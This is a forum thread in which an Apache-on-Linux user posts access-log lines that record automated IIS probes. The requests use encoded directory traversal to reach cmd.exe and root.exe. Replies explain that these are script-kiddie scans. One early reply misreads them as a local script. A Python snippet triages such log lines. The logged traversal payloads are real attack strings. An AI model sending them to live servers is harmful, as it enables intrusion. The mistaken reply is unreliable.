should i be concerned
This is a log from my Apache logs.

24.0.77.100 - - [26/Jan/2004:02:19:47 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 299
24.0.77.100 - - [26/Jan/2004:02:19:50 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 297
24.0.77.100 - - [26/Jan/2004:02:19:53 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307
24.0.77.100 - - [26/Jan/2004:02:19:56 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307
24.0.77.100 - - [26/Jan/2004:02:20:00 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321
24.0.77.100 - - [26/Jan/2004:02:20:03 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 338
24.0.77.100 - - [26/Jan/2004:02:20:06 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 338
24.0.77.100 - - [26/Jan/2004:02:20:09 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 354
24.0.77.100 - - [26/Jan/2004:02:20:12 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320
24.0.77.100 - - [26/Jan/2004:02:20:25 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 311
24.0.77.100 - - [26/Jan/2004:02:20:35 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 311
24.0.77.100 - - [26/Jan/2004:02:20:38 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321
24.0.77.100 - - [26/Jan/2004:02:20:41 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321

Should I be concerned that someone is 'trying' to find what could be important files, if this were a Windows machine? What constitutes something I should take action towards? This guy's not too bright obviously.. but still.. does snooping around like this happen often?

Other question.. can I block my own IP from being logged? As 80% or more of the log is either my cable IP, eth0 IP or loopback's IP.. so it would be nice if I just saw what other people were doing. |
It doesn't look like someone is snooping around your system. The reason why I say this is because it looks like there is access to a scripts directory through your web server setup. A script might be executing cmd.exe to run correctly. I'm not sure what software you're using as your web server, but to my knowledge, I don't believe you can omit your own IP address from a log.
|
No, you really don't need to be worried about it. They're scanning for IIS exploits, they really don't apply to you :)
I run a webserver and get that a lot, it's mostly just script-kiddies looking around for an *easy hack*. Maybe jot down the IP that the scan came from and keep an eye out for other scans from the same general IP address. If it gets to be a problem bring it up w/ the ISP. If you start seeing Apache-specific exploits then you should start being a little more worried. Just keep an eye on your secure and message log files for unusual stuff. All in all you're fine tho. You'll probably see a lot more of those. |
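An added example, not part of the original thread: one way to do the "jot down the IP and keep an eye out" step, and to view the log without your own addresses, is a small triage script. The sample lines are constructed (documentation addresses, modelled on the log above), and `own_ips`, `classify` and `triage` are names chosen for this illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed sample lines (documentation addresses), modelled on the log in the thread.
SAMPLE = [
    '198.51.100.7 - - [26/Jan/2004:02:19:47 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 299',
    '198.51.100.7 - - [26/Jan/2004:02:20:00 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321',
    '198.51.100.7 - - [26/Jan/2004:02:20:25 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 311',
    '127.0.0.1 - - [26/Jan/2004:02:21:00 -0500] "GET /index.html HTTP/1.1" 200 1043',
    '203.0.113.9 - - [26/Jan/2004:02:22:10 -0500] "GET /index.html HTTP/1.1" 200 1043',
]
# Common/combined log format: client address, request path, status code.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*" (\d{3})')
# Windows/IIS names the probes ask for; none exist on a Linux Apache host.
IIS_MARKERS = ("cmd.exe", "root.exe", "/winnt/", "/_vti_bin/", "/msadc/")

def decode_fully(path, rounds=3):
    """Percent-decode repeatedly so double encoding (%255c -> %5c -> backslash) is exposed."""
    for _ in range(rounds):
        decoded = unquote(path, errors="replace")
        if decoded == path:
            break
        path = decoded
    return path

def classify(path):
    """Return the reasons a request path looks like an IIS probe (empty list if none)."""
    decoded = decode_fully(path).replace("\\", "/").lower()
    reasons = []
    if any(marker in decoded for marker in IIS_MARKERS):
        reasons.append("iis-artifact")
    # %c1%1c is the overlong-encoded slash seen in the log above.
    if "../" in decoded or "%c1%1c" in path.lower():
        reasons.append("traversal")
    return reasons

def triage(lines, own_ips=()):
    """Count probe requests per client, skipping the admin's own addresses."""
    report = defaultdict(lambda: {"probes": 0, "served": 0})
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m.group(1) in own_ips:
            continue
        ip, path, status = m.groups()
        if classify(path):
            report[ip]["probes"] += 1
            if status.startswith("2"):  # a 2xx means the server actually returned something
                report[ip]["served"] += 1
    return dict(report)

if __name__ == "__main__":
    print(triage(SAMPLE, own_ips={"127.0.0.1"}))
```

A non-zero `served` count is the case worth investigating; a run of 404/400 responses like the one in the thread means the probes found nothing.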
ok thanks..
Although I don't have a scripts folder within my webpage directory.. so that's why I was wondering why they'd be trying to look for something in there.. I am using apache2 on Fedora Linux. |